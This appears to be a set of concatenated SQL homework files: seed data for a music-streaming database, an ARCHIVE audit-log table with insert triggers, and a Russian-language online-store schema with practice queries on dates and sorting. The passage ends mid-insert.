(381,10,'1','2020-12-26 05:38:13.0'),
(384,5,'1','2020-12-26 05:38:13.0'),
(395,29,'1','2020-12-26 05:38:13.0'),
(398,3,'1','2020-12-26 05:38:13.0'),
(398,25,'1','2020-12-26 05:38:13.0'),
(399,10,'1','2020-12-26 05:38:13.0');
insert into music1.likedplaylists (users_id,playlist_id,likedornot,updated_at) values
(405,17,'1','2020-12-26 05:38:13.0'),
(408,15,'1','2020-12-26 05:38:13.0'),
(409,4,'1','2020-12-26 05:38:13.0'),
(410,13,'1','2020-12-26 05:38:12.0'),
(414,26,'1','2020-12-26 05:38:12.0'),
(418,5,'1','2020-12-26 05:38:13.0'),
(420,13,'1','2020-12-26 05:38:13.0'),
(426,3,'1','2020-12-26 05:38:12.0'),
(428,18,'0','2020-12-26 05:38:13.0'),
(436,6,'1','2020-12-26 05:38:12.0');
insert into music1.likedplaylists (users_id,playlist_id,likedornot,updated_at) values
(443,28,'1','2020-12-26 05:38:13.0'),
(443,22,'0','2020-12-26 05:38:13.0'),
(446,17,'1','2020-12-26 05:38:13.0'),
(454,6,'1','2020-12-26 05:38:13.0'),
(464,22,'1','2020-12-26 05:38:13.0'),
(475,16,'1','2020-12-26 05:38:13.0'),
(478,1,'1','2020-12-26 05:38:13.0'),
(484,30,'1','2020-12-26 05:38:13.0'),
(485,10,'1','2020-12-26 05:38:13.0'),
(498,20,'1','2020-12-26 05:38:12.0');
insert into music1.likedsongs (users_id,song_id,likedornot,updated_at) values
(1,48,'1','2020-12-26 05:37:58.0'),
(12,35,'1','2020-12-26 05:37:58.0'),
(20,34,'1','2020-12-26 05:37:58.0'),
(20,52,'1','2020-12-26 05:37:57.0'),
(22,35,'1','2020-12-26 05:37:58.0'),
(30,15,'1','2020-12-26 05:37:57.0'),
(35,60,'1','2020-12-26 05:37:57.0'),
(44,4,'1','2020-12-26 05:37:58.0'),
(48,63,'1','2020-12-26 05:37:57.0'),
(52,50,'1','2020-12-26 05:37:57.0');
insert into music1.likedsongs (users_id,song_id,likedornot,updated_at) values
(54,32,'1','2020-12-26 05:37:58.0'),
(57,10,'1','2020-12-26 05:37:58.0'),
(81,32,'1','2020-12-26 05:37:58.0'),
(81,12,'1','2020-12-26 05:37:57.0'),
(87,19,'1','2020-12-26 05:37:58.0'),
(88,44,'1','2020-12-26 05:37:57.0'),
(89,45,'1','2020-12-26 05:37:57.0'),
(90,47,'1','2020-12-26 05:37:58.0'),
(95,55,'1','2020-12-26 05:37:57.0'),
(104,25,'1','2020-12-26 05:37:57.0');
insert into music1.likedsongs (users_id,song_id,likedornot,updated_at) values
(111,61,'1','2020-12-26 05:37:57.0'),
(113,64,'1','2020-12-26 05:37:58.0'),
(120,59,'1','2020-12-26 05:37:58.0'),
(122,29,'0','2020-12-26 05:37:58.0'),
(134,60,'1','2020-12-26 05:37:58.0'),
(136,31,'1','2020-12-26 05:37:58.0'),
(137,45,'1','2020-12-26 05:37:58.0'),
(138,21,'1','2020-12-26 05:37:57.0'),
(141,17,'1','2020-12-26 05:37:58.0'),
(146,11,'1','2020-12-26 05:37:57.0');
insert into music1.likedsongs (users_id,song_id,likedornot,updated_at) values
(149,54,'1','2020-12-26 05:37:57.0'),
(163,29,'1','2020-12-26 05:37:58.0'),
(167,34,'1','2020-12-26 05:37:58.0'),
(169,24,'1','2020-12-26 05:37:57.0'),
(171,61,'1','2020-12-26 05:37:57.0'),
(182,36,'0','2020-12-26 05:37:57.0'),
(187,55,'0','2020-12-26 05:37:57.0'),
(187,2,'1','2020-12-26 05:37:57.0'),
(188,37,'1','2020-12-26 05:37:58.0'),
(189,27,'1','2020-12-26 05:37:58.0');
insert into music1.likedsongs (users_id,song_id,likedornot,updated_at) values
(195,10,'1','2020-12-26 05:37:57.0'),
(203,5,'1','2020-12-26 05:37:57.0'),
(211,64,'1','2020-12-26 05:37:57.0'),
(214,27,'1','2020-12-26 05:37:58.0'),
(220,17,'1','2020-12-26 05:37:57.0'),
(224,50,'1','2020-12-26 05:37:58.0'),
(232,7,'1','2020-12-26 05:37:57.0'),
(232,65,'1','2020-12-26 05:37:58.0'),
(233,39,'1','2020-12-26 05:37:58.0'),
(241,37,'1','2020-12-26 05:37:57.0');
insert into music1.likedsongs (users_id,song_id,likedornot,updated_at) values
(242,27,'1','2020-12-26 05:37:57.0'),
(250,42,'1','2020-12-26 05:37:58.0'),
(255,3,'1','2020-12-26 05:37:58.0'),
(262,19,'1','2020-12-26 05:37:57.0'),
(271,40,'1','2020-12-26 05:37:58.0'),
(279,23,'1','2020-12-26 05:37:58.0'),
(282,45,'1','2020-12-26 05:37:58.0'),
(282,18,'0','2020-12-26 05:37:58.0'),
(286,60,'1','2020-12-26 05:37:58.0'),
(287,21,'1','2020-12-26 05:37:57.0');
insert into music1.likedsongs (users_id,song_id,likedornot,updated_at) values
(288,51,'1','2020-12-26 05:37:57.0'),
(294,63,'1','2020-12-26 05:37:58.0'),
(310,25,'0','2020-12-26 05:37:57.0'),
(315,27,'1','2020-12-26 05:37:57.0'),
(319,11,'1','2020-12-26 05:37:58.0'),
(322,11,'1','2020-12-26 05:37:58.0'),
(330,25,'1','2020-12-26 05:37:58.0'),
(337,55,'1','2020-12-26 05:37:57.0'),
(349,30,'1','2020-12-26 05:37:57.0'),
(356,57,'1','2020-12-26 05:37:57.0');
insert into music1.likedsongs (users_id,song_id,likedornot,updated_at) values
(361,59,'1','2020-12-26 05:37:57.0'),
(361,11,'0','2020-12-26 05:37:58.0'),
(365,47,'1','2020-12-26 05:37:58.0'),
(369,10,'0','2020-12-26 05:37:58.0'),
(370,56,'1','2020-12-26 05:37:58.0'),
(370,7,'1','2020-12-26 05:37:57.0'),
(374,55,'1','2020-12-26 05:37:57.0'),
(379,11,'1','2020-12-26 05:37:57.0'),
(380,24,'1','2020-12-26 05:37:58.0'),
(382,63,'1','2020-12-26 05:37:58.0');
insert into music1.likedsongs (users_id,song_id,likedornot,updated_at) values
(387,59,'1','2020-12-26 05:37:57.0'),
(388,13,'1','2020-12-26 05:37:58.0'),
(398,16,'1','2020-12-26 05:37:58.0'),
(402,16,'1','2020-12-26 05:37:57.0'),
(410,15,'1','2020-12-26 05:37:57.0'),
(423,17,'1','2020-12-26 05:37:58.0'),
(435,13,'0','2020-12-26 05:37:58.0'),
(438,49,'1','2020-12-26 05:37:57.0'),
(439,32,'1','2020-12-26 05:37:58.0'),
(447,23,'1','2020-12-26 05:37:57.0');
insert into music1.likedsongs (users_id,song_id,likedornot,updated_at) values
(449,50,'1','2020-12-26 05:37:57.0'),
(451,61,'1','2020-12-26 05:37:58.0'),
(458,32,'1','2020-12-26 05:37:57.0'),
(476,35,'1','2020-12-26 05:37:58.0'),
(477,61,'1','2020-12-26 05:37:58.0'),
(478,10,'1','2020-12-26 05:37:57.0'),
(479,20,'1','2020-12-26 05:37:57.0'),
(485,15,'1','2020-12-26 05:37:58.0'),
(492,34,'0','2020-12-26 05:37:57.0'),
(500,41,'1','2020-12-26 05:37:57.0');
insert into music1.streams (users_id,song_id,album_id,listened_at) values
(177,1,1,'2020-12-26 06:43:54.0'),
(94,1,1,'2020-12-26 06:43:54.0'),
(93,3,1,'2020-12-26 06:43:54.0'),
(489,3,1,'2020-12-26 06:43:54.0'),
(412,3,1,'2020-12-26 06:43:54.0'),
(313,3,1,'2020-12-26 06:43:54.0'),
(23,4,1,'2020-12-26 06:43:54.0'),
(459,5,1,'2020-12-26 06:43:54.0'),
(499,5,1,'2020-12-26 06:43:54.0'),
(20,6,1,'2020-12-26 06:43:54.0');
insert into music1.streams (users_id,song_id,album_id,listened_at) values
(449,6,1,'2020-12-26 06:43:54.0'),
(176,6,1,'2020-12-26 06:43:54.0'),
(186,7,1,'2020-12-26 06:43:54.0'),
(266,7,1,'2020-12-26 06:43:54.0'),
(435,7,1,'2020-12-26 06:43:54.0'),
(260,7,1,'2020-12-26 06:43:54.0'),
(3,7,1,'2020-12-26 06:43:54.0'),
(297,7,1,'2020-12-26 06:43:54.0'),
(301,7,1,'2020-12-26 06:43:54.0'),
(429,8,1,'2020-12-26 06:43:54.0');
insert into music1.streams (users_id,song_id,album_id,listened_at) values
(241,8,1,'2020-12-26 06:43:54.0'),
(420,8,1,'2020-12-26 06:43:54.0'),
(120,8,1,'2020-12-26 06:43:54.0'),
(8,9,1,'2020-12-26 06:43:54.0'),
(167,9,1,'2020-12-26 06:43:54.0'),
(279,9,1,'2020-12-26 06:43:54.0'),
(219,9,1,'2020-12-26 06:43:54.0'),
(462,9,1,'2020-12-26 06:43:54.0'),
(331,11,1,'2020-12-26 06:43:54.0'),
(11,12,1,'2020-12-26 06:43:54.0');
insert into music1.streams (users_id,song_id,album_id,listened_at) values
(466,12,1,'2020-12-26 06:43:54.0'),
(234,12,1,'2020-12-26 06:43:54.0'),
(458,12,1,'2020-12-26 06:43:54.0'),
(467,13,9,'2020-12-26 06:43:54.0'),
(214,13,9,'2020-12-26 06:43:54.0'),
(437,13,9,'2020-12-26 06:43:54.0'),
(137,13,9,'2020-12-26 06:43:54.0'),
(422,13,9,'2020-12-26 06:43:54.0'),
(423,14,9,'2020-12-26 06:43:54.0'),
(269,14,9,'2020-12-26 06:43:54.0');
insert into music1.streams (users_id,song_id,album_id,listened_at) values
(130,14,9,'2020-12-26 06:43:54.0'),
(206,15,9,'2020-12-26 06:43:54.0'),
(66,16,9,'2020-12-26 06:43:54.0'),
(282,17,9,'2020-12-26 06:43:54.0'),
(398,17,9,'2020-12-26 06:43:54.0'),
(391,18,9,'2020-12-26 06:43:54.0'),
(277,19,9,'2020-12-26 06:43:54.0'),
(196,19,9,'2020-12-26 06:43:54.0'),
(428,19,9,'2020-12-26 06:43:54.0'),
(202,19,9,'2020-12-26 06:43:54.0');
insert into music1.streams (users_id,song_id,album_id,listened_at) values
(429,19,9,'2020-12-26 06:43:54.0'),
(288,20,9,'2020-12-26 06:43:54.0'),
(8,20,9,'2020-12-26 06:43:54.0'),
(253,21,9,'2020-12-26 06:43:54.0'),
(50,21,9,'2020-12-26 06:43:54.0'),
(379,21,9,'2020-12-26 06:43:54.0'),
(486,22,9,'2020-12-26 06:43:54.0'),
(76,22,9,'2020-12-26 06:43:54.0'),
(373,22,9,'2020-12-26 06:43:54.0'),
(78,22,9,'2020-12-26 06:43:54.0');
insert into music1.streams (users_id,song_id,album_id,listened_at) values
(175,22,9,'2020-12-26 06:43:54.0'),
(184,22,9,'2020-12-26 06:43:54.0'),
(186,23,9,'2020-12-26 06:43:54.0'),
(175,23,9,'2020-12-26 06:43:54.0'),
(400,24,3,'2020-12-26 06:43:54.0'),
(183,24,3,'2020-12-26 06:43:54.0'),
(405,24,3,'2020-12-26 06:43:54.0'),
(311,24,3,'2020-12-26 06:43:54.0'),
(490,25,3,'2020-12-26 06:43:54.0'),
(150,25,3,'2020-12-26 06:43:54.0');
insert into music1.streams (users_id,song_id,album_id,listened_at) values
(14,25,3,'2020-12-26 06:43:54.0'),
(388,26,3,'2020-12-26 06:43:54.0'),
(396,26,3,'2020-12-26 06:43:54.0'),
(380,26,3,'2020-12-26 06:43:54.0'),
(95,26,3,'2020-12-26 06:43:54.0'),
(214,27,3,'2020-12-26 06:43:54.0'),
(353,27,3,'2020-12-26 06:43:54.0'),
(306,28,3,'2020-12-26 06:43:54.0'),
(211,28,3,'2020-12-26 06:43:54.0'),
(185,29,3,'2020-12-26 06:43:54.0');
insert into music1.streams (users_id,song_id,album_id,listened_at) values
(392,29,3,'2020-12-26 06:43:54.0'),
(305,29,3,'2020-12-26 06:43:54.0'),
(29,29,3,'2020-12-26 06:43:54.0'),
(487,29,3,'2020-12-26 06:43:54.0'),
(387,29,3,'2020-12-26 06:43:54.0'),
(155,30,3,'2020-12-26 06:43:54.0'),
(6,30,3,'2020-12-26 06:43:54.0'),
(151,30,3,'2020-12-26 06:43:54.0'),
(191,31,3,'2020-12-26 06:43:54.0'),
(175,31,3,'2020-12-26 06:43:54.0');
insert into music1.streams (users_id,song_id,album_id,listened_at) values
(402,31,3,'2020-12-26 06:43:54.0'),
(182,31,3,'2020-12-26 06:43:54.0'),
(295,31,3,'2020-12-26 06:43:54.0'),
(473,31,3,'2020-12-26 06:43:54.0'),
(225,31,3,'2020-12-26 06:43:54.0'),
(233,32,3,'2020-12-26 06:43:54.0'),
(479,32,3,'2020-12-26 06:43:54.0'),
(500,33,3,'2020-12-26 06:43:54.0'),
(256,33,3,'2020-12-26 06:43:54.0'),
(10,33,3,'2020-12-26 06:43:54.0');
insert into music1.streams (users_id,song_id,album_id,listened_at) values
(40,34,3,'2020-12-26 06:43:54.0'),
(170,34,3,'2020-12-26 06:43:54.0'),
(129,36,6,'2020-12-26 06:43:54.0'),
(137,36,6,'2020-12-26 06:43:54.0'),
(286,37,6,'2020-12-26 06:43:54.0'),
(467,37,6,'2020-12-26 06:43:54.0'),
(417,37,6,'2020-12-26 06:43:54.0'),
(434,37,6,'2020-12-26 06:43:54.0'),
(108,38,6,'2020-12-26 06:43:54.0'),
(208,38,6,'2020-12-26 06:43:54.0');
insert into music1.streams (users_id,song_id,album_id,listened_at) values
(416,38,6,'2020-12-26 06:43:54.0'),
(18,38,6,'2020-12-26 06:43:54.0'),
(332,39,6,'2020-12-26 06:43:54.0'),
(392,40,6,'2020-12-26 06:43:54.0'),
(282,40,6,'2020-12-26 06:43:54.0'),
(181,40,6,'2020-12-26 06:43:54.0'),
(200,41,6,'2020-12-26 06:43:54.0'),
(407,42,6,'2020-12-26 06:43:54.0'),
(281,42,6,'2020-12-26 06:43:54.0'),
(488,42,6,'2020-12-26 06:43:54.0');
insert into music1.streams (users_id,song_id,album_id,listened_at) values
(435,42,6,'2020-12-26 06:43:54.0'),
(182,42,6,'2020-12-26 06:43:54.0'),
(468,42,6,'2020-12-26 06:43:54.0'),
(138,42,6,'2020-12-26 06:43:54.0'),
(409,43,6,'2020-12-26 06:43:54.0'),
(183,43,6,'2020-12-26 06:43:54.0'),
(64,44,6,'2020-12-26 06:43:54.0'),
(391,44,6,'2020-12-26 06:43:54.0'),
(103,45,5,'2020-12-26 06:43:54.0'),
(306,45,5,'2020-12-26 06:43:54.0');
insert into music1.streams (users_id,song_id,album_id,listened_at) values
(358,45,5,'2020-12-26 06:43:54.0'),
(391,45,5,'2020-12-26 06:43:54.0'),
(16,45,5,'2020-12-26 06:43:54.0'),
(108,46,5,'2020-12-26 06:43:54.0'),
(242,46,5,'2020-12-26 06:43:54.0'),
(145,47,5,'2020-12-26 06:43:54.0'),
(6,48,5,'2020-12-26 06:43:54.0'),
(129,48,5,'2020-12-26 06:43:54.0'),
(416,48,5,'2020-12-26 06:43:54.0'),
(454,48,5,'2020-12-26 06:43:54.0');
insert into music1.streams (users_id,song_id,album_id,listened_at) values
(305,49,5,'2020-12-26 06:43:54.0'),
(397,49,5,'2020-12-26 06:43:54.0'),
(388,49,5,'2020-12-26 06:43:54.0'),
(469,50,5,'2020-12-26 06:43:54.0'),
(493,50,5,'2020-12-26 06:43:54.0'),
(198,50,5,'2020-12-26 06:43:54.0'),
(428,50,5,'2020-12-26 06:43:54.0'),
(22,51,5,'2020-12-26 06:43:54.0'),
(413,51,5,'2020-12-26 06:43:54.0'),
(312,51,5,'2020-12-26 06:43:54.0');
insert into music1.streams (users_id,song_id,album_id,listened_at) values
(352,52,5,'2020-12-26 06:43:54.0'),
(38,52,5,'2020-12-26 06:43:54.0'),
(449,52,5,'2020-12-26 06:43:54.0'),
(84,53,5,'2020-12-26 06:43:54.0'),
(403,53,5,'2020-12-26 06:43:54.0'),
(320,54,5,'2020-12-26 06:43:54.0'),
(95,54,5,'2020-12-26 06:43:54.0'),
(90,54,5,'2020-12-26 06:43:54.0'),
(469,54,5,'2020-12-26 06:43:54.0'),
(364,55,13,'2020-12-26 06:43:54.0');
insert into music1.streams (users_id,song_id,album_id,listened_at) values
(309,56,13,'2020-12-26 06:43:54.0'),
(380,56,13,'2020-12-26 06:43:54.0'),
(111,56,13,'2020-12-26 06:43:54.0'),
(62,56,13,'2020-12-26 06:43:54.0'),
(92,57,13,'2020-12-26 06:43:54.0'),
(126,57,13,'2020-12-26 06:43:54.0'),
(283,57,13,'2020-12-26 06:43:54.0'),
(486,58,13,'2020-12-26 06:43:54.0'),
(354,58,13,'2020-12-26 06:43:54.0'),
(118,58,13,'2020-12-26 06:43:54.0');
insert into music1.streams (users_id,song_id,album_id,listened_at) values
(201,58,13,'2020-12-26 06:43:54.0'),
(420,58,13,'2020-12-26 06:43:54.0'),
(457,58,13,'2020-12-26 06:43:54.0'),
(133,59,13,'2020-12-26 06:43:54.0'),
(23,59,13,'2020-12-26 06:43:54.0'),
(342,59,13,'2020-12-26 06:43:54.0'),
(54,59,13,'2020-12-26 06:43:54.0'),
(5,59,13,'2020-12-26 06:43:54.0'),
(242,59,13,'2020-12-26 06:43:54.0'),
(440,59,13,'2020-12-26 06:43:54.0');
insert into music1.streams (users_id,song_id,album_id,listened_at) values
(7,59,13,'2020-12-26 06:43:54.0'),
(336,60,13,'2020-12-26 06:43:54.0'),
(15,60,13,'2020-12-26 06:43:54.0'),
(474,60,13,'2020-12-26 06:43:54.0'),
(139,60,13,'2020-12-26 06:43:54.0'),
(277,61,13,'2020-12-26 06:43:54.0'),
(295,61,13,'2020-12-26 06:43:54.0'),
(86,61,13,'2020-12-26 06:43:54.0'),
(327,61,13,'2020-12-26 06:43:54.0'),
(86,62,13,'2020-12-26 06:43:54.0');
insert into music1.streams (users_id,song_id,album_id,listened_at) values
(30,62,13,'2020-12-26 06:43:54.0'),
(77,63,13,'2020-12-26 06:43:54.0'),
(84,64,13,'2020-12-26 06:43:54.0'),
(447,64,13,'2020-12-26 06:43:54.0'),
(404,65,13,'2020-12-26 06:43:54.0'),
(140,65,13,'2020-12-26 06:43:54.0'),
(134,65,13,'2020-12-26 06:43:54.0'),
(99,65,13,'2020-12-26 06:43:54.0'),
(141,65,13,'2020-12-26 06:43:54.0'),
(157,65,13,'2020-12-26 06:43:54.0');<file_sep>use homework;
-- Оптимизация запросов
-- 1. Создайте таблицу logs типа Archive. Пусть при каждом создании записи в таблицах users, catalogs и products в таблицу logs помещается время и дата создания записи, название таблицы, идентификатор первичного ключа и содержимое поля name.
-- Re-runnable drop: a bare DROP TABLE errors out on a fresh database
-- where `logs` does not exist yet.
drop table if exists logs;
-- Audit log: one row per record created in users, catalogs or products.
-- ARCHIVE engine is append-only and compressed -- a good fit for an
-- insert-only log table (no UPDATE/DELETE support needed).
create table if not exists logs(
created_at datetime not null, -- when the source row was created
table_name varchar(255) not null, -- source table: 'users' | 'catalogs' | 'products'
id bigint not null, -- primary-key value of the source row
name_value varchar(255) not null -- value of the source row's `name` column
) engine=archive default charset=utf8;
-- при каждом создании записи в таблицах users, catalogs и products
-- Log every new row in `users`.
drop trigger if exists create_log_on_insert;
delimiter //
-- Must be AFTER INSERT, not BEFORE: `id` is SERIAL (AUTO_INCREMENT), and
-- in a BEFORE INSERT trigger NEW.id has not been generated yet (it reads
-- as 0). AFTER INSERT sees the real assigned key.
create trigger create_log_on_insert after insert on users
for each row
begin
insert into logs(created_at, table_name, id, name_value)
values (now(), 'users', new.id, new.name);
end//
delimiter ;
-- Smoke test: creating a user should produce a matching row in `logs`.
insert into users (name, birthday_at)
values ('Андрей', '2020-01-01');
select * from logs;
-- Same logging for `catalogs` and `products`. Drop first so the script
-- is re-runnable (CREATE TRIGGER fails if the trigger already exists).
drop trigger if exists create_log_on_insert2;
drop trigger if exists create_log_on_insert3;
delimiter //
-- AFTER INSERT so NEW.id carries the generated AUTO_INCREMENT value
-- (it would be 0 in a BEFORE INSERT trigger).
create trigger create_log_on_insert2 after insert on catalogs
for each row
begin
insert into logs(created_at, table_name, id, name_value)
values (now(), 'catalogs', new.id, new.name);
end//
create trigger create_log_on_insert3 after insert on products
for each row
begin
insert into logs(created_at, table_name, id, name_value)
values (now(), 'products', new.id, new.name);
end//
delimiter ;
<file_sep>create database if not exists homework;
-- Select the working database for all homework scripts.
use homework;
-- Store sections (product categories); the UNIQUE prefix index rejects
-- duplicate names (compared on the first 10 characters only).
DROP TABLE IF EXISTS catalogs;
CREATE TABLE catalogs (
id SERIAL PRIMARY KEY,
name VARCHAR(255) COMMENT 'Название раздела',
UNIQUE unique_name(name(10))
) COMMENT = 'Разделы интернет-магазина';
-- Seed data: NULL lets the SERIAL column auto-assign ids.
INSERT INTO catalogs VALUES
(NULL, 'Процессоры'),
(NULL, 'Материнские платы'),
(NULL, 'Видеокарты'),
(NULL, 'Жесткие диски'),
(NULL, 'Оперативная память');
-- Customers, with automatic created_at/updated_at bookkeeping.
DROP TABLE IF EXISTS users;
CREATE TABLE users (
id SERIAL PRIMARY KEY,
name VARCHAR(255) COMMENT 'Имя покупателя',
birthday_at DATE COMMENT 'Дата рождения',
created_at DATETIME DEFAULT CURRENT_TIMESTAMP,
updated_at DATETIME DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP
) COMMENT = 'Покупатели';
INSERT INTO users (name, birthday_at) VALUES
('Геннадий', '1990-10-05'),
('Наталья', '1984-11-12'),
('Александр', '1985-05-20'),
('Сергей', '1988-02-14'),
('Иван', '1998-01-12'),
('Мария', '1992-08-29');
-- Product catalog entries; catalog_id is indexed for joins/filtering.
DROP TABLE IF EXISTS products;
CREATE TABLE products (
id SERIAL PRIMARY KEY,
name VARCHAR(255) COMMENT 'Название',
description TEXT COMMENT 'Описание',
price DECIMAL (11,2) COMMENT 'Цена',
catalog_id INT UNSIGNED,
created_at DATETIME DEFAULT CURRENT_TIMESTAMP,
updated_at DATETIME DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
KEY index_of_catalog_id (catalog_id)
) COMMENT = 'Товарные позиции';
INSERT INTO products
(name, description, price, catalog_id)
VALUES
('Intel Core i3-8100', 'Процессор для настольных персональных компьютеров, основанных на платформе Intel.', 7890.00, 1),
('Intel Core i5-7400', 'Процессор для настольных персональных компьютеров, основанных на платформе Intel.', 12700.00, 1),
('AMD FX-8320E', 'Процессор для настольных персональных компьютеров, основанных на платформе AMD.', 4780.00, 1),
('AMD FX-8320', 'Процессор для настольных персональных компьютеров, основанных на платформе AMD.', 7120.00, 1),
('ASUS ROG MAXIMUS X HERO', 'Материнская плата ASUS ROG MAXIMUS X HERO, Z370, Socket 1151-V2, DDR4, ATX', 19310.00, 2),
('Gigabyte H310M S2H', 'Материнская плата Gigabyte H310M S2H, H310, Socket 1151-V2, DDR4, mATX', 4790.00, 2),
('MSI B250M GAMING PRO', 'Материнская плата MSI B250M GAMING PRO, B250, Socket 1151, DDR4, mATX', 5060.00, 2);
-- Orders: one row per order, indexed by customer.
DROP TABLE IF EXISTS orders;
CREATE TABLE orders (
id SERIAL PRIMARY KEY,
user_id INT UNSIGNED,
created_at DATETIME DEFAULT CURRENT_TIMESTAMP,
updated_at DATETIME DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
KEY index_of_user_id(user_id)
) COMMENT = 'Заказы';
-- Order line items: order <-> product many-to-many with a quantity.
DROP TABLE IF EXISTS orders_products;
CREATE TABLE orders_products (
id SERIAL PRIMARY KEY,
order_id INT UNSIGNED,
product_id INT UNSIGNED,
total INT UNSIGNED DEFAULT 1 COMMENT 'Количество заказанных товарных позиций',
created_at DATETIME DEFAULT CURRENT_TIMESTAMP,
updated_at DATETIME DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP
) COMMENT = 'Состав заказа';
-- Per-user / per-product discounts with an optional validity window.
DROP TABLE IF EXISTS discounts;
CREATE TABLE discounts (
id SERIAL PRIMARY KEY,
user_id INT UNSIGNED,
product_id INT UNSIGNED,
discount FLOAT UNSIGNED COMMENT 'Величина скидки от 0.0 до 1.0',
started_at DATETIME,
finished_at DATETIME,
created_at DATETIME DEFAULT CURRENT_TIMESTAMP,
updated_at DATETIME DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
KEY index_of_user_id(user_id),
KEY index_of_product_id(product_id)
) COMMENT = 'Скидки';
-- Warehouses and their per-product stock levels.
DROP TABLE IF EXISTS storehouses;
CREATE TABLE storehouses (
id SERIAL PRIMARY KEY,
name VARCHAR(255) COMMENT 'Название',
created_at DATETIME DEFAULT CURRENT_TIMESTAMP,
updated_at DATETIME DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP
) COMMENT = 'Склады';
DROP TABLE IF EXISTS storehouses_products;
CREATE TABLE storehouses_products (
id SERIAL PRIMARY KEY,
storehouse_id INT UNSIGNED,
product_id INT UNSIGNED,
value INT UNSIGNED COMMENT 'Запас товарной позиции на складе',
created_at DATETIME DEFAULT CURRENT_TIMESTAMP,
updated_at DATETIME DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP
) COMMENT = 'Запасы на складе';
-- Practice: operators, filtering, sorting and limiting

-- 1. created_at / updated_at in `users` turned out to be empty.
--    Fill them with the current date and time.
INSERT INTO users (name, birthday_at,created_at, updated_at) VALUES
('Евгения', '1999-10-05', null, null),
('Карина', '1998-10-05', null, null),
('Александра', '1970-10-05', null, null);
SELECT * from users;
UPDATE users
SET created_at = NOW() where created_at is null;
UPDATE users
set updated_at = NOW() where updated_at is null;
SELECT * from users;

-- 2. created_at / updated_at were mistakenly created as VARCHAR and held
--    values like '20.10.2017 8:10'. Convert the columns to DATETIME while
--    preserving the data.
ALTER TABLE users
CHANGE COLUMN `created_at` `created_at` VARCHAR(256),
CHANGE COLUMN `updated_at` `updated_at` VARCHAR(256);
-- Normalize any 'DD.MM.YYYY H:MM'-style values BEFORE changing the type back:
-- MySQL cannot parse that format as DATETIME, so without this step such rows
-- would be lost. The WHERE guard leaves already-ISO values untouched.
UPDATE users
SET created_at = STR_TO_DATE(created_at, '%d.%m.%Y %H:%i')
WHERE created_at REGEXP '^[0-9]{2}\\.[0-9]{2}\\.[0-9]{4}';
UPDATE users
SET updated_at = STR_TO_DATE(updated_at, '%d.%m.%Y %H:%i')
WHERE updated_at REGEXP '^[0-9]{2}\\.[0-9]{2}\\.[0-9]{4}';
ALTER TABLE users
CHANGE COLUMN `created_at` `created_at` DATETIME DEFAULT CURRENT_TIMESTAMP,
CHANGE COLUMN `updated_at` `updated_at` DATETIME DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP;
describe users;
SELECT * from users;

-- 3. Sort storehouses_products by `value` ascending, but rows with zero
--    stock must come last.
describe storehouses_products;
INSERT INTO storehouses_products (storehouse_id, product_id, value) VALUES
(1, 8, 0),
(1, 9, 2500),
(1, 29, 0),
(1, 34, 30),
(1, 4, 500),
(1, 1, 1);
-- The IF() expression puts zero-stock rows into a second sort bucket.
select value from storehouses_products
order by if(value > 0, 0, 1), value;

-- 4. Select users born in May or August; months are given as a list of
--    English names, so compare against MONTHNAME() directly.
SELECT name, birthday_at from users
where monthname(birthday_at) in ('May', 'August');
SELECT name, birthday_at,
lower(monthname(birthday_at)) as `month`
from users
where month(birthday_at) in (5, 8)
order by `month`;

-- 5. SELECT * FROM catalogs WHERE id IN (5, 1, 2);
--    Return the rows in exactly the order given in the IN list.
SELECT * from catalogs
where id IN (5, 1, 2)
order by FIELD(id, 5, 1, 2);
<file_sep>create database if not exists homework;
-- Select the working database for all homework scripts.
use homework;
-- Store sections (product categories); the UNIQUE prefix index rejects
-- duplicate names (compared on the first 10 characters only).
DROP TABLE IF EXISTS catalogs;
CREATE TABLE catalogs (
id SERIAL PRIMARY KEY,
name VARCHAR(255) COMMENT 'Название раздела',
UNIQUE unique_name(name(10))
) COMMENT = 'Разделы интернет-магазина';
-- Seed data: NULL lets the SERIAL column auto-assign ids.
INSERT INTO catalogs VALUES
(NULL, 'Процессоры'),
(NULL, 'Материнские платы'),
(NULL, 'Видеокарты'),
(NULL, 'Жесткие диски'),
(NULL, 'Оперативная память');
-- Customers, with automatic created_at/updated_at bookkeeping.
DROP TABLE IF EXISTS users;
CREATE TABLE users (
id SERIAL PRIMARY KEY,
name VARCHAR(255) COMMENT 'Имя покупателя',
birthday_at DATE COMMENT 'Дата рождения',
created_at DATETIME DEFAULT CURRENT_TIMESTAMP,
updated_at DATETIME DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP
) COMMENT = 'Покупатели';
INSERT INTO users (name, birthday_at) VALUES
('Геннадий', '1990-10-05'),
('Наталья', '1984-11-12'),
('Александр', '1985-05-20'),
('Сергей', '1988-02-14'),
('Иван', '1998-01-12'),
('Мария', '1992-08-29');
-- Product catalog entries; catalog_id is indexed for joins/filtering.
DROP TABLE IF EXISTS products;
CREATE TABLE products (
id SERIAL PRIMARY KEY,
name VARCHAR(255) COMMENT 'Название',
description TEXT COMMENT 'Описание',
price DECIMAL (11,2) COMMENT 'Цена',
catalog_id INT UNSIGNED,
created_at DATETIME DEFAULT CURRENT_TIMESTAMP,
updated_at DATETIME DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
KEY index_of_catalog_id (catalog_id)
) COMMENT = 'Товарные позиции';
INSERT INTO products
(name, description, price, catalog_id)
VALUES
('Intel Core i3-8100', 'Процессор для настольных персональных компьютеров, основанных на платформе Intel.', 7890.00, 1),
('Intel Core i5-7400', 'Процессор для настольных персональных компьютеров, основанных на платформе Intel.', 12700.00, 1),
('AMD FX-8320E', 'Процессор для настольных персональных компьютеров, основанных на платформе AMD.', 4780.00, 1),
('AMD FX-8320', 'Процессор для настольных персональных компьютеров, основанных на платформе AMD.', 7120.00, 1),
('ASUS ROG MAXIMUS X HERO', 'Материнская плата ASUS ROG MAXIMUS X HERO, Z370, Socket 1151-V2, DDR4, ATX', 19310.00, 2),
